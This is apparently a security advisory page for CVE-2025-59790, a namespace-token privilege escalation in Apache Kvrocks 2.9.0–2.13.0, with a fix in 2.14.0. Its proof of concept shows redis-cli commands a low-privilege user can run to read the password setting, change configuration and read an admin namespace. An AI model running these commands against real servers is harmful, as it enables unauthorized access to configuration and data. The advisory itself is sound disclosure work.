MediumCVSS 5.4Privilege EscalationCVE-2025-59790
Published 2025
Apache Kvrocks Privilege Escalation
BugBunny.ai discovered a privilege escalation vulnerability in Apache Kvrocks where namespace token validation allowed users to escalate privileges across namespaces, potentially accessing admin-level functionality with limited credentials.
Responsibly DisclosedView CVE →
Summary
Impact:Low-privilege users can execute privileged commands
Vector:Namespace token validation bypass
Affected:Kvrocks 2.9.0 - 2.13.0
Status:Fixed in v2.14.0
Proof of Concept
# Connect as low-privilege user
redis-cli -h kvrocks-host -p 6666 -a low_priv_password
# Despite limited permissions, execute privileged commands
> CONFIG GET requirepass
1) "requirepass"
2) ""
# Or modify configuration that should be admin-only
> CONFIG SET maxclients 100
OK
# In vulnerable versions (2.9.0-2.13.0), namespace token
# validation allowed privilege escalation across namespaces
> NAMESPACE GET admin_namespace
# Returns data from admin namespace despite lacking permission
# Fixed in v2.14.0: Proper privilege checks now enforcedMitigation
Upgrade to Apache Kvrocks v2.14.0 or later. The fix implements proper privilege checks for all commands.
Credits & Disclosure
Identified by BugBunny.ai and responsibly disclosed to the Apache Kvrocks maintainers.
Reporter: BugBunny.aiCVE-2025-59790